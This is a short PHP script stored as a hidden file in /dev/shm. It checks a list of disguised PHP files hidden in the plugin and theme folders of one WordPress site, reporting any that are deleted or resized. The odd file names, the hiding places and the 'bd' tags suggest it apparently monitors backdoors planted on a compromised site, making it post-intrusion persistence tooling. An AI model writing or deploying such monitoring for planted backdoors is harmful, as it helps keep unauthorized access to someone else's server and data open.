File: //dev/shm/.reference
<?php $r = '/home/mghvskufpc/banteng-389.org'; $x = ["/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Optimizer/Error/classes.php"=>"bd@@669471@@846",
"/wp-content/litespeed/error-404-1782372615.php"=>"bd@@692513@@689",
"/wp-content/themes/jbg1st-ks/inc/compatibility/lifterlms/customizer/sections/layout/class.astra.lifter.general.configs.php"=>"bd@@659535@@1010",
"/wp-content/themes/home-1782225209/custom.file.3.1782225209.php"=>"bd@@648788@@905",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/DeclarationList/onupdate.php"=>"bd@@667990@@887",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/admin_rooms.inc.php"=>"bd@@670061@@871",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/AttributeList/warpedit.php"=>"bd@@659061@@948",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/mpasm.php"=>"bd@@669846@@953",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/DocRuleset/error_checking.php"=>"bd@@659374@@967",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/class.events.inc.php"=>"bd@@659631@@873",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/Exception/uploaddogs.php"=>"bd@@668882@@910",
"/wp-content/plugins/wordpress-seo/src/ai/generator/infrastructure/endpoints/get.subscription.endpoint.php"=>"bd@@659695@@894",
"/wp-content/plugins/wordpress-seo/src/expiring-store/domain/no.current.exception.exception.php"=>"bd@@655375@@786",
"/index.php"=>"bd@@828565@@405"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');